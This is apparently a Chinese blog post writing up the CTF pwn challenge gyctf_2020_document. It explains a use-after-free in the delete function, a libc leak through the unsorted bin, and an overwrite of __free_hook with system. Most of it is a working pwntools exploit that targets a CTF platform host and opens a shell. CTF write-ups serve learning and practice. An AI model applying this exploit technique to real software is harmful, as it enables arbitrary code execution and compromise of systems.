gyctf_2020_document(uaf)

gyctf_2020_document:

保护全开
请添加图片描述

漏洞分析:

delete函数里指针未清零
请添加图片描述

大致思路:

这题限制了add时chunk的size,为0x8和0x80,edit时只能从+0x10处改0x70个字符
1.先add一个chunk,在add一个chunk,这个chunk里的name填/bin/sh\x00
(这时0x8chunk中存有指向binsh地址的指针了),我们释放第一个chunk,由于0x80大小,释放到unsortbin中,我们show,就能泄露libc
2.我们接下来的目的是控制申请0x8大小中存的指针为free_hook
再add一个chunk时,0x8的控制chunk会从unsortbin中割0x20,剩下的unsortbin的chunk放入small_bin中,但由于edit时只能从+0x10处改0x70个字符,我们故技重施再add一个chunk,仍旧从small_bin中割0x20,我们就能改到0x8中存的指针为free_hook了
3.我们用edit改free_hook为system
4.利用原本有存有binsh地址的0x8chunk,delete它就是执行system(/bin/sh)

exp:

from pwn import *
local_file  = './gyctf_2020_document'
local_libc  = './libc-2.23.so'
remote_libc = './libc-2.23.so'
#remote_libc = '/home/glibc-all-in-one/libs/buu/libc-2.23.so'
select = 1
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node4.buuoj.cn',26665)
    libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se      = lambda data               :r.send(data)
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims                         :r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))
o_g_32_old = [0x3ac3c, 0x3ac3e, 0x3ac42, 0x3ac49, 0x5faa5, 0x5faa6]
o_g_32 = [0x3ac6c, 0x3ac6e, 0x3ac72, 0x3ac79, 0x5fbd5, 0x5fbd6]
o_g_old = [0x45216,0x4526a,0xf02a4,0xf1147]
o_g = [0x45226, 0x4527a, 0xf0364, 0xf1207]
def debug(cmd=''):
     gdb.attach(r,cmd)
#---------------------------------
def add(name,sex,info):
        sla('Give me your choice : \n','1')
        sa('input name\n',name)
        sla('input sex\n',str(sex))
        sa('input information\n',info)
def show(index):
        sla('Give me your choice : \n','2')
        sla('Give me your index : \n',str(index))
def edit(index,info):
        sla('Give me your choice : \n','3')
        sla('Give me your index : \n',str(index))
        sla('Are you sure change sex?\n','Y\n')
        sa('Now change information\n',info)
def delete(index):
        sla('Give me your choice : \n','4')
        sla('Give me your index : \n',str(index))
#------------------------------------------
add('a'*8,0x0,'b'*0x70)
add('/bin/sh\x00',0x1,'d'*0x70)
#--------------------------------------
delete(0)
show(0)
libc_base=uu64(ru('\x7f')[-6:])-88-0x10-libc.sym['__malloc_hook']
system=libc_base+libc.sym['system']
free_hook=libc_base+libc.sym['__free_hook']
print 'free_hook='+str(hex(free_hook))
#-----------------------------------------
add('e'*8,0x2,'f'*0x70)
add('g'*8,0x3,'h'*0x70)
edit(0,p64(0)+p64(0x21)+p64(free_hook-0x10)+p64(1)+p64(0)+p64(0x51)+'a'*0x40)
edit(3,p64(system)+'\x00'*0x68)
delete(1)
#debug()
r.interactive()
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值